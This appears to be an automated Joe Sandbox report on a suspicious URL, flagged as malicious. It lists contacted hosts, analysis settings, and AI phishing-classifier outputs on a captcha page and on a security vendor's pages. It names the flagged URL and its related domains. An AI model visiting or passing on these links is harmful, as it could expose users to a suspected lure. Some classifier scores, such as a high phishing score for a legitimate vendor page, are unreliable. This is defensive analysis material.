                                                                                                                                                                                                                                                                                                                                                                          23181QUICKSILVER1CAfalse
                                                                                                                                                                                                                                                                                                                                                                          104.18.40.240
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                          142.250.185.142
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                          23.109.170.65
                                                                                                                                                                                                                                                                                                                                                                          chaeynore.comNetherlands
                                                                                                                                                                                                                                                                                                                                                                          7979SERVERS-COMUSfalse
                                                                                                                                                                                                                                                                                                                                                                          149.56.240.129
                                                                                                                                                                                                                                                                                                                                                                          unknownCanada
                                                                                                                                                                                                                                                                                                                                                                          16276OVHFRfalse
                                                                                                                                                                                                                                                                                                                                                                          172.67.74.186
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                          149.56.240.127
                                                                                                                                                                                                                                                                                                                                                                          s4.histats.comCanada
                                                                                                                                                                                                                                                                                                                                                                          16276OVHFRfalse
                                                                                                                                                                                                                                                                                                                                                                          34.117.77.79
                                                                                                                                                                                                                                                                                                                                                                          ml314.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                                                                                                                                                                                                                                          3.33.220.150
                                                                                                                                                                                                                                                                                                                                                                          match.adsrvr.orgUnited States
                                                                                                                                                                                                                                                                                                                                                                          8987AMAZONEXPANSIONGBfalse
                                                                                                                                                                                                                                                                                                                                                                          104.18.80.204
                                                                                                                                                                                                                                                                                                                                                                          forms.hsforms.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                          142.250.186.36
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                          104.17.176.91
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                          63.35.31.53
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                          3.75.62.37
                                                                                                                                                                                                                                                                                                                                                                          ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudUnited States
                                                                                                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                          104.18.241.108
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                          185.89.210.244
                                                                                                                                                                                                                                                                                                                                                                          ib.anycast.adnxs.comGermany
                                                                                                                                                                                                                                                                                                                                                                          29990ASN-APPNEXUSfalse
                                                                                                                                                                                                                                                                                                                                                                          104.18.36.155
                                                                                                                                                                                                                                                                                                                                                                          dsum-sec.casalemedia.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                          3.120.214.218
                                                                                                                                                                                                                                                                                                                                                                          ps.eyeota.netUnited States
                                                                                                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                          3.248.68.102
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                          104.17.175.201
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                          104.16.141.209
                                                                                                                                                                                                                                                                                                                                                                          js.hs-scripts.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                          157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          star-mini.c10r.facebook.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          32934FACEBOOKUSfalse
                                                                                                                                                                                                                                                                                                                                                                          104.26.12.60
                                                                                                                                                                                                                                                                                                                                                                          t.dtscdn.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                          52.223.40.198
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          8987AMAZONEXPANSIONGBfalse
                                                                                                                                                                                                                                                                                                                                                                          37.252.171.85
                                                                                                                                                                                                                                                                                                                                                                          unknownEuropean Union
                                                                                                                                                                                                                                                                                                                                                                          29990ASN-APPNEXUSfalse
                                                                                                                                                                                                                                                                                                                                                                          104.17.25.14
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                          18.66.102.51
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                                                                                                                                          99.86.4.9
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                          141.101.120.11
                                                                                                                                                                                                                                                                                                                                                                          e.dtscout.comEuropean Union
                                                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                          35.214.136.108
                                                                                                                                                                                                                                                                                                                                                                          user-data-eu.bidswitch.netUnited States
                                                                                                                                                                                                                                                                                                                                                                          19527GOOGLE-2USfalse
                                                                                                                                                                                                                                                                                                                                                                          141.101.120.10
                                                                                                                                                                                                                                                                                                                                                                          t.dtscout.comEuropean Union
                                                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                          104.19.175.188
                                                                                                                                                                                                                                                                                                                                                                          forms-na1.hsforms.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                          151.101.129.229
                                                                                                                                                                                                                                                                                                                                                                          jsdelivr.map.fastly.netUnited States
                                                                                                                                                                                                                                                                                                                                                                          54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                                                                                                          216.58.206.78
                                                                                                                                                                                                                                                                                                                                                                          youtube-ui.l.google.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                          185.64.191.210
                                                                                                                                                                                                                                                                                                                                                                          pug-lhr-bc.pubmnet.comUnited Kingdom
                                                                                                                                                                                                                                                                                                                                                                          62713AS-PUBMATICUSfalse
                                                                                                                                                                                                                                                                                                                                                                          35.244.159.8
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                          65.9.66.122
                                                                                                                                                                                                                                                                                                                                                                          tags.crwdcntrl.netUnited States
                                                                                                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                          104.16.160.168
                                                                                                                                                                                                                                                                                                                                                                          js.hs-analytics.netUnited States
                                                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                          67.202.105.33
                                                                                                                                                                                                                                                                                                                                                                          ic.tynt.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          32748STEADFASTUSfalse
                                                                                                                                                                                                                                                                                                                                                                          67.202.105.31
                                                                                                                                                                                                                                                                                                                                                                          de.tynt.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          32748STEADFASTUSfalse
                                                                                                                                                                                                                                                                                                                                                                          IP
                                                                                                                                                                                                                                                                                                                                                                          192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                                                                                                                                          Analysis ID:1533052
                                                                                                                                                                                                                                                                                                                                                                          Start date and time:2024-10-14 11:11:27 +02:00
                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                                                                                                                          Overall analysis duration:0h 4m 54s
                                                                                                                                                                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                                                                                                                                                                          Cookbook file name:browseurl.jbs
                                                                                                                                                                                                                                                                                                                                                                          Sample URL:https://hy.markkasmick.click/cx/tbSgVco_akr35UznLBgMmL_dGwr4A9B_vyg2WwEB0w1LRjKjQMyEnB89mCfTRy8oqnbpdFunqinBhx0TsHvSJdUHnbksc3kdcKecoDvVHa5LAm46at*Mm*Ro3D2CHoEu2bmOqt4Ic8O_7AE7Igwgbi5c8zmZf6Fqp*_XqcjREPr7609oL7vKm8FfjGLhMetr2oxtpR3ywH4BUElgc7EI7usxj8CJYEUMktwlb7YUzPvYQ7P1PilEV0LqiXI5sm6QVF4ZGl5TIXhnQLOG0kl6WQ0miiZysBfhaNojnPTUvisUUkwOp2fYTxkXEIhZ7ESJ7qXYLxQbm*y4RJVeZZZ3RY5rX8W5t8cudSM9Zx7UaxgLH56aOv81v4QfUnzroT9v*7LR3jPEjz*YXr2LwuykYQnzvV6boWl*o*gU4jkPE6MocRRlRoC6uUx2e1Wseo8MqGWTT2uXo4HbQDneiMF84sQ34*3TnbAxXWu8xLbb_mAOQxUTA3T5TUUZKeU3ziolM8TSVV5Y5LQTFGtNArddwJKdWCb_cLYMxUJpZ3cqM_A
                                                                                                                                                                                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                                                                                                                          Number of analysed new started processes analysed:15
                                                                                                                                                                                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                                                                                                                                                                          Classification:mal48.win@29/364@367/100
                                                                                                                                                                                                                                                                                                                                                                          EGA Information:Failed
                                                                                                                                                                                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                                                                                                                                                                                          • Number of executed functions: 0
                                                                                                                                                                                                                                                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                                                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 142.250.185.67, 142.250.184.206, 142.251.168.84, 142.250.184.195, 34.104.35.123, 172.217.18.2, 172.66.132.118, 172.66.132.114, 104.18.187.31, 104.18.186.31, 142.250.185.162, 216.58.206.42, 95.101.111.167, 95.101.111.145, 172.64.153.173, 104.18.34.83, 95.101.111.153, 95.101.111.156, 104.18.35.167, 172.64.152.89, 142.250.74.202, 172.217.18.10, 216.58.212.129, 142.250.184.226, 216.58.212.163, 52.149.20.212, 142.250.184.194, 199.232.214.172, 216.58.206.65, 216.58.206.67, 142.250.186.130, 172.217.23.98, 2.23.197.190, 52.165.164.15, 142.250.185.129, 142.250.185.66, 142.250.185.106, 172.217.18.3, 142.250.185.131, 13.95.31.18, 142.250.185.74, 142.250.184.202, 142.250.186.42, 142.250.186.170, 216.58.212.138, 142.250.185.234, 142.250.184.234, 216.58.206.74, 142.250.185.202, 172.217.23.106, 142.250.186.106, 142.250.185.138, 172.217.16.202, 142.250.185.174, 142.250.186.104, 88.221.110.227, 88.221.110.136, 142.250.185.238, 142.250.184.200, 13.107.42.14, 104.18.41.41, 172.64.146.21
                                                                                                                                                                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): tags.bluekai.com.edgekey.net, cdn.jsdelivr.net.cdn.cloudflare.net, www.googleadservices.com, pixel.rubiconproject.net.akadns.net, slscr.update.microsoft.com, clientservices.googleapis.com, time.windows.com, cdn-tc.33across.com.cdn.cloudflare.net, e213908.b.akamaiedge.net, cdn.tynt.com.cdn.cloudflare.net, e9126.x.akamaiedge.net, l-0005.l-msedge.net, clients2.google.com, www.googletagmanager.com, a24365-c026.edgekey.net, cert1.a1.atm.aqfer.net.edgekey.net, e167121.b.akamaiedge.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, s10.histats.com.cdn.cloudflare.net, www.gstatic.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.google-analytics.com, www-linkedin-com.l-0005.l-msedge.net, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, ajax.googleapis.com, fonts.gstatic.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.w
                                                                                                                                                                                                                                                                                                                                                                          • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                                                                                          No simulations
                                                                                                                                                                                                                                                                                                                                                                          InputOutput
                                                                                                                                                                                                                                                                                                                                                                          URL: https://ald.my.id/ Model: gemini-1.5-flash
                                                                                                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                                                                                                          "text": "Select all squares with street signs If there are none,
                                                                                                                                                                                                                                                                                                                                                                           click skip VERIFY",
                                                                                                                                                                                                                                                                                                                                                                           "contains_trigger_text": false,
                                                                                                                                                                                                                                                                                                                                                                           "trigger_text": "",
                                                                                                                                                                                                                                                                                                                                                                           "prominent_button_name": "VERIFY",
                                                                                                                                                                                                                                                                                                                                                                           "text_input_field_labels": [],
                                                                                                                                                                                                                                                                                                                                                                           "pdf_icon_visible": false,
                                                                                                                                                                                                                                                                                                                                                                           "has_visible_qrcode": false,
                                                                                                                                                                                                                                                                                                                                                                           "has_visible_captcha": true,
                                                                                                                                                                                                                                                                                                                                                                           "has_urgent_text": false}
                                                                                                                                                                                                                                                                                                                                                                          URL: https://ald.my.id/ Model: jbxai
                                                                                                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                                                                                                          "brands":[],
                                                                                                                                                                                                                                                                                                                                                                          "text":"Select all squares with street signs If there are none,
                                                                                                                                                                                                                                                                                                                                                                           click skip",
                                                                                                                                                                                                                                                                                                                                                                          "contains_trigger_text":true,
                                                                                                                                                                                                                                                                                                                                                                          "trigger_text":"Select all squares with street signs If there are none,
                                                                                                                                                                                                                                                                                                                                                                           click skip",
                                                                                                                                                                                                                                                                                                                                                                          "prominent_button_name":"VERIFY",
                                                                                                                                                                                                                                                                                                                                                                          "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                                                                                                                                                          "pdf_icon_visible":false,
                                                                                                                                                                                                                                                                                                                                                                          "has_visible_captcha":true,
                                                                                                                                                                                                                                                                                                                                                                          "has_urgent_text":false,
                                                                                                                                                                                                                                                                                                                                                                          "has_visible_qrcode":false}
                                                                                                                                                                                                                                                                                                                                                                          URL: https://ald.my.id/ Model: gemini-1.5-flash
                                                                                                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                                                                                                          "brands": []}
                                                                                                                                                                                                                                                                                                                                                                          URL: https://ald.my.id/ Model: jbxai
                                                                                                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                                                                                                          "phishing_score":5,
                                                                                                                                                                                                                                                                                                                                                                          "brands":"unknown",
                                                                                                                                                                                                                                                                                                                                                                          "legit_domain":"unknown",
                                                                                                                                                                                                                                                                                                                                                                          "classification":"unknown",
                                                                                                                                                                                                                                                                                                                                                                          "reasons":["The brand is marked as 'unknown',
                                                                                                                                                                                                                                                                                                                                                                           and no specific brand can be identified from the URL.",
                                                                                                                                                                                                                                                                                                                                                                          "The URL 'ald.my.id' does not directly associate with any well-known or known brand.",
                                                                                                                                                                                                                                                                                                                                                                          "The domain extension '.id' is the country code for Indonesia,
                                                                                                                                                                                                                                                                                                                                                                           which is not inherently suspicious but requires further context.",
                                                                                                                                                                                                                                                                                                                                                                          "The URL structure is short and lacks any obvious misspellings or suspicious elements,
                                                                                                                                                                                                                                                                                                                                                                           but without a known brand association,
                                                                                                                                                                                                                                                                                                                                                                           it remains ambiguous.",
                                                                                                                                                                                                                                                                                                                                                                          "The lack of information on input fields makes it difficult to assess the site's purpose or legitimacy."],
                                                                                                                                                                                                                                                                                                                                                                          "brand_matches":[],
                                                                                                                                                                                                                                                                                                                                                                          "url_match":false,
                                                                                                                                                                                                                                                                                                                                                                          "brand_input":"unknown",
                                                                                                                                                                                                                                                                                                                                                                          "input_fields":"unknown"}
                                                                                                                                                                                                                                                                                                                                                                          URL: https://ald.my.id/ Model: jbxai
                                                                                                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                                                                                                          "brands":[],
                                                                                                                                                                                                                                                                                                                                                                          "text":"Select all squares with street signs If there are none,
                                                                                                                                                                                                                                                                                                                                                                           click skip",
                                                                                                                                                                                                                                                                                                                                                                          "contains_trigger_text":false,
                                                                                                                                                                                                                                                                                                                                                                          "trigger_text":"",
                                                                                                                                                                                                                                                                                                                                                                          "prominent_button_name":"VERIFY",
                                                                                                                                                                                                                                                                                                                                                                          "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                                                                                                                                                          "pdf_icon_visible":false,
                                                                                                                                                                                                                                                                                                                                                                          "has_visible_captcha":false,
                                                                                                                                                                                                                                                                                                                                                                          "has_urgent_text":false,
                                                                                                                                                                                                                                                                                                                                                                          "has_visible_qrcode":false}
                                                                                                                                                                                                                                                                                                                                                                          URL: https://ald.my.id/ Model: gemini-1.5-flash
                                                                                                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                                                                                                          "text": "Select all squares with street signs If there are none,
                                                                                                                                                                                                                                                                                                                                                                           click skip VERIFY",
                                                                                                                                                                                                                                                                                                                                                                           "contains_trigger_text": false,
                                                                                                                                                                                                                                                                                                                                                                           "trigger_text": "",
                                                                                                                                                                                                                                                                                                                                                                           "prominent_button_name": "VERIFY",
                                                                                                                                                                                                                                                                                                                                                                           "text_input_field_labels": [],
                                                                                                                                                                                                                                                                                                                                                                           "pdf_icon_visible": false,
                                                                                                                                                                                                                                                                                                                                                                           "has_visible_qrcode": false,
                                                                                                                                                                                                                                                                                                                                                                           "has_visible_captcha": true,
                                                                                                                                                                                                                                                                                                                                                                           "has_urgent_text": false}
                                                                                                                                                                                                                                                                                                                                                                          URL: https://ald.my.id/ Model: gemini-1.5-flash
                                                                                                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                                                                                                          "brands": []}
                                                                                                                                                                                                                                                                                                                                                                          URL: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5 Model: jbxai
                                                                                                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                                                                                                          "brands":["Managed Methods"],
                                                                                                                                                                                                                                                                                                                                                                          "text":"Automating Cybersecurity & Safety: 5 Use Cases for Cloud Monitor & Content Filter",
                                                                                                                                                                                                                                                                                                                                                                          "contains_trigger_text":false,
                                                                                                                                                                                                                                                                                                                                                                          "trigger_text":"",
                                                                                                                                                                                                                                                                                                                                                                          "prominent_button_name":"FREE Google & Microsoft Security Checklist for K-12 Schools",
                                                                                                                                                                                                                                                                                                                                                                          "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                                                                                                                                                          "pdf_icon_visible":false,
                                                                                                                                                                                                                                                                                                                                                                          "has_visible_captcha":false,
                                                                                                                                                                                                                                                                                                                                                                          "has_urgent_text":false,
                                                                                                                                                                                                                                                                                                                                                                          "has_visible_qrcode":false}
                                                                                                                                                                                                                                                                                                                                                                          URL: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5 Model: gemini-1.5-flash
                                                                                                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                                                                                                          "text": "Managed Methods Free Recording Automating Cybersecurity & Safety: 5 Use Cases for Cloud Monitor & Content Filter FREE! Google & Microsoft Security Checklist for K-12 Schools This website uses cookies to collect information about how you interact with our website and allow us to remember you. We use this information in order to improve and customize your browsing experience and for analytics and metrics about our visitors both on this website and other media. To learn more,
                                                                                                                                                                                                                                                                                                                                                                           please see our Privacy Policy. Accept Decline",
                                                                                                                                                                                                                                                                                                                                                                           "contains_trigger_text": false,
                                                                                                                                                                                                                                                                                                                                                                           "trigger_text": "",
                                                                                                                                                                                                                                                                                                                                                                           "prominent_button_name": "Accept",
                                                                                                                                                                                                                                                                                                                                                                           "text_input_field_labels": [],
                                                                                                                                                                                                                                                                                                                                                                           "pdf_icon_visible": false,
                                                                                                                                                                                                                                                                                                                                                                           "has_visible_qrcode": false,
                                                                                                                                                                                                                                                                                                                                                                           "has_visible_captcha": false,
                                                                                                                                                                                                                                                                                                                                                                           "has_urgent_text": false}
                                                                                                                                                                                                                                                                                                                                                                          URL: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5 Model: gemini-1.5-flash
                                                                                                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                                                                                                          "brands": ["Managed Methods",
                                                                                                                                                                                                                                                                                                                                                                           "Google",
                                                                                                                                                                                                                                                                                                                                                                           "Microsoft"]}
                                                                                                                                                                                                                                                                                                                                                                          URL: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5 Model: gemini-1.5-flash
                                                                                                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                                                                                                          "text": "Managed Methods Free Recording Automating Cybersecurity & Safety: 5 Use Cases for Cloud Monitor & Content Filter FREE! Google & Microsoft Security Checklist for K-12 Schools Additional Resources Download the Slide Deck FREE! Google/Microsoft Security & Safety Audit",
                                                                                                                                                                                                                                                                                                                                                                           "contains_trigger_text": false,
                                                                                                                                                                                                                                                                                                                                                                           "trigger_text": "",
                                                                                                                                                                                                                                                                                                                                                                           "prominent_button_name": "FREE! Google & Microsoft Security Checklist for K-12 Schools",
                                                                                                                                                                                                                                                                                                                                                                           "text_input_field_labels": [],
                                                                                                                                                                                                                                                                                                                                                                           "pdf_icon_visible": false,
                                                                                                                                                                                                                                                                                                                                                                           "has_visible_qrcode": false,
                                                                                                                                                                                                                                                                                                                                                                           "has_visible_captcha": false,
                                                                                                                                                                                                                                                                                                                                                                           "has_urgent_text": false}
                                                                                                                                                                                                                                                                                                                                                                          URL: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5 Model: jbxai
                                                                                                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                                                                                                          "brands":["Managed Methods"],
                                                                                                                                                                                                                                                                                                                                                                          "text":"Automating Cybersecurity & Safety: 5 Use Cases for Cloud Monitor & Content Filter",
                                                                                                                                                                                                                                                                                                                                                                          "contains_trigger_text":false,
                                                                                                                                                                                                                                                                                                                                                                          "trigger_text":"",
                                                                                                                                                                                                                                                                                                                                                                          "prominent_button_name":"FREE Google & Microsoft Security Checklist for K-12 Schools",
                                                                                                                                                                                                                                                                                                                                                                          "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                                                                                                                                                          "pdf_icon_visible":false,
                                                                                                                                                                                                                                                                                                                                                                          "has_visible_captcha":false,
                                                                                                                                                                                                                                                                                                                                                                          "has_urgent_text":false,
                                                                                                                                                                                                                                                                                                                                                                          "has_visible_qrcode":false}
                                                                                                                                                                                                                                                                                                                                                                          URL: https://get.managedmethods.com/cloud-application-security-checklist Model: jbxai
                                                                                                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                                                                                                          "brands":["Google",
                                                                                                                                                                                                                                                                                                                                                                          "Microsoft"],
                                                                                                                                                                                                                                                                                                                                                                          "text":"Google Workspace & Microsoft 365 Data Security Checklist",
                                                                                                                                                                                                                                                                                                                                                                          "contains_trigger_text":true,
                                                                                                                                                                                                                                                                                                                                                                          "trigger_text":"Make Sure Your District's Cloud Apps Security Settings Are Properly Configured",
                                                                                                                                                                                                                                                                                                                                                                          "prominent_button_name":"Learn & Secure",
                                                                                                                                                                                                                                                                                                                                                                          "text_input_field_labels":["Work Email",
                                                                                                                                                                                                                                                                                                                                                                          "Job Title"],
                                                                                                                                                                                                                                                                                                                                                                          "pdf_icon_visible":false,
                                                                                                                                                                                                                                                                                                                                                                          "has_visible_captcha":false,
                                                                                                                                                                                                                                                                                                                                                                          "has_urgent_text":false,
                                                                                                                                                                                                                                                                                                                                                                          "has_visible_qrcode":false}
                                                                                                                                                                                                                                                                                                                                                                          URL: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5 Model: gemini-1.5-flash
                                                                                                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                                                                                                          "brands": ["Managed Methods",
                                                                                                                                                                                                                                                                                                                                                                           "Google",
                                                                                                                                                                                                                                                                                                                                                                           "Microsoft"]}
                                                                                                                                                                                                                                                                                                                                                                          URL: https://get.managedmethods.com/cloud-application-security-checklist Model: jbxai
                                                                                                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                                                                                                          "brands":["Google",
                                                                                                                                                                                                                                                                                                                                                                          "Microsoft"],
                                                                                                                                                                                                                                                                                                                                                                          "text":"Google Workspace & Microsoft 365 Data Security Checklist",
                                                                                                                                                                                                                                                                                                                                                                          "contains_trigger_text":true,
                                                                                                                                                                                                                                                                                                                                                                          "trigger_text":"Make Sure Your District's Cloud Apps Security Settings Are Properly Configured",
                                                                                                                                                                                                                                                                                                                                                                          "prominent_button_name":"Learn & Secure",
                                                                                                                                                                                                                                                                                                                                                                          "text_input_field_labels":["Work Email",
                                                                                                                                                                                                                                                                                                                                                                          "Job Title"],
                                                                                                                                                                                                                                                                                                                                                                          "pdf_icon_visible":false,
                                                                                                                                                                                                                                                                                                                                                                          "has_visible_captcha":false,
                                                                                                                                                                                                                                                                                                                                                                          "has_urgent_text":false,
                                                                                                                                                                                                                                                                                                                                                                          "has_visible_qrcode":false}
                                                                                                                                                                                                                                                                                                                                                                          URL: https://get.managedmethods.com/cloud-application-security-checklist Model: gemini-1.5-flash
                                                                                                                                                                                                                                                                                                                                                                          URL: https://get.managedmethods.com/cloud-application-security-checklist Model: jbxai
                                                                                                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                                                                                                          "phishing_score":8,
                                                                                                                                                                                                                                                                                                                                                                          "brands":"Google",
                                                                                                                                                                                                                                                                                                                                                                          "legit_domain":"google.com",
                                                                                                                                                                                                                                                                                                                                                                          "classification":"wellknown",
                                                                                                                                                                                                                                                                                                                                                                          "reasons":["The brand 'Google' is well-known and typically associated with the domain 'google.com'.",
                                                                                                                                                                                                                                                                                                                                                                          "The URL 'get.managedmethods.com' does not match the legitimate domain for Google.",
                                                                                                                                                                                                                                                                                                                                                                          "The domain 'managedmethods.com' does not have any known association with Google.",
                                                                                                                                                                                                                                                                                                                                                                          "The presence of 'get' as a subdomain and 'managedmethods.com' as the main domain suggests a third-party service,
                                                                                                                                                                                                                                                                                                                                                                           which is not directly related to Google.",
                                                                                                                                                                                                                                                                                                                                                                          "The input field 'Work Email' is commonly targeted in phishing attempts to collect sensitive information."],
                                                                                                                                                                                                                                                                                                                                                                          "brand_matches":[false],
                                                                                                                                                                                                                                                                                                                                                                          "url_match":true,
                                                                                                                                                                                                                                                                                                                                                                          "brand_input":"Google",
                                                                                                                                                                                                                                                                                                                                                                          "input_fields":"Work Email"}
                                                                                                                                                                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, original size modulo 2^32 24732
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
